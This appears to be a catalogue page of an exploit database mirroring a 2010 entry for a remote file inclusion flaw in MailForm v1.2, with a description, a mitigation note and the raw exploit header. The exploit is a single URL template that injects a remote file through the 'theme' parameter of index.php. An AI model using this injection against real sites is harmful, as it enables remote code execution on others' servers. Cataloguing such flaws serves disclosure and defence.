header-logo
Suggest Exploit
vendor:
by:
LoSt.HaCkEr / aDaM_TRoJaN
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name:
Affected Version From: v1.2
Affected Version To: v1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP
2010

MailForm Remote File Include

This exploit allows an attacker to include remote files in the MailForm software. The vulnerability exists in the 'index.php' file, specifically in the 'theme' parameter. By manipulating this parameter, an attacker can execute arbitrary code from a remote location.

Mitigation:

To mitigate this vulnerability, it is recommended to update the MailForm software to the latest version and sanitize user input to prevent remote file inclusion.
Source

Exploit-DB raw data:

# Exploit Title: [MailForm Remote File Include ] 
# Date: [14-8-2010] 
# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
# Software Link: [http://scripts.bdr130.net/files/any/MailForm.zip] 
# Version: [v 1.2 ] 
# Tested on: [Windows XP] 
# CVE : [هكر المسيب] 
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit: http://target/MailForm/HTML/index.php?theme=[EV!L]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers

Navigation

Suggest Exploit

Services By CQR

cqrsecured